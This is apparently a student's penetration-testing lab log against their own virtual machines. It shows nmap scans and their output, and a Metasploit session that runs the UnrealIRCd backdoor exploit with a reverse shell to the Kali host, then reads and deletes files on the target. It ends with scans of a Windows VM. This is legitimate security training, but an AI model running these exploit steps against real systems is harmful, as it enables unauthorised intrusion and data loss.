pentest log

friday 19
re-imported kali VM (newest 2021 version may have different settings from 2020.4)
checked that all VM using NatNetwork
launched KaliVM and msVM
logged in to both VM
obtained IP addresses for both machinesusing igconfig msVM is 10.0.2.4 KaliVM is 10.0.2.15
pinged from KaliVM to msVM successfully
created target.txt file on msVM and inserted some text, saved the file in home directory
used touch and then nano editor
nmap
carried out nmap scan of target
└─$ nmap -v -A 10.0.2.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-19 06:45 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating Ping Scan at 06:45
Scanning 10.0.2.4 [2 ports]
Completed Ping Scan at 06:45, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:45
Completed Parallel DNS resolution of 1 host. at 06:45, 0.02s elapsed
Initiating Connect Scan at 06:45
Scanning 10.0.2.4 [1000 ports]
Discovered open port 445/tcp on 10.0.2.4
Discovered open port 25/tcp on 10.0.2.4
Discovered open port 5900/tcp on 10.0.2.4
Discovered open port 3306/tcp on 10.0.2.4
Discovered open port 139/tcp on 10.0.2.4
Discovered open port 53/tcp on 10.0.2.4
Discovered open port 21/tcp on 10.0.2.4
Discovered open port 23/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 111/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
Discovered open port 1524/tcp on 10.0.2.4
Discovered open port 1099/tcp on 10.0.2.4
Discovered open port 513/tcp on 10.0.2.4
Discovered open port 2049/tcp on 10.0.2.4
Discovered open port 512/tcp on 10.0.2.4
Discovered open port 514/tcp on 10.0.2.4
Discovered open port 5432/tcp on 10.0.2.4
Discovered open port 8009/tcp on 10.0.2.4
Discovered open port 2121/tcp on 10.0.2.4
Discovered open port 6000/tcp on 10.0.2.4
Discovered open port 8180/tcp on 10.0.2.4
zenmap not available
explore legion instead runs in sudo
legion allows session result to be saved to file
auto screenshots services such as web server home page, tomcat home page, db and ftp
list of cve vulnerabilities with hyperlink to cve database
setting up metasploit framework
/etc/init.d/postgresql start
sudo msfdb init
msfconsole
find an exploit
search unrealircd
> exploit/unix/irc/unreal_ircd_3281_backdoor
deploy exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor
configure
set RHOST 10.0.2.4
set LHOST 10.0.2.15
show payloads
>
Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
..
11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
deliver payload
set payload cmd/unix/reverse
exploit
explore target using shell
ifconfig
whoami
pwd
cd /
cd home
ls
cd msfadmin
cat target.txt
touch hacked.txt
rm target.txt
ls
finishing metasploitable session
ctrl + c
quit
monday 22
Setting up Kali and Windows

Kali settings: internal network
image.png
Windows sp0: network
image.png
Secret file on Windows
image.png
TCP/IP properties for Windows
image.png
Kali Net settings(right click network icon in top right)
image.png
check for confirmation of network (manual setting for ip4)
Testing Kali - Windows network connection: ping
image.png
Hacking Windows from Kali
nmap scan needs sudo
sudo nmap -sN 10.0.2.0/24
image.png
port scanner
sudo nmap -PS 10.0.2.16
>
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00032s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
fingerprint the target
└─$ sudo nmap -O -osscan-guess 10.0.2.16 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
Want to print your doc?
This is not the way.
Try clicking the ⋯ next to your doc name or using a keyboard shortcut (
CtrlP
) instead.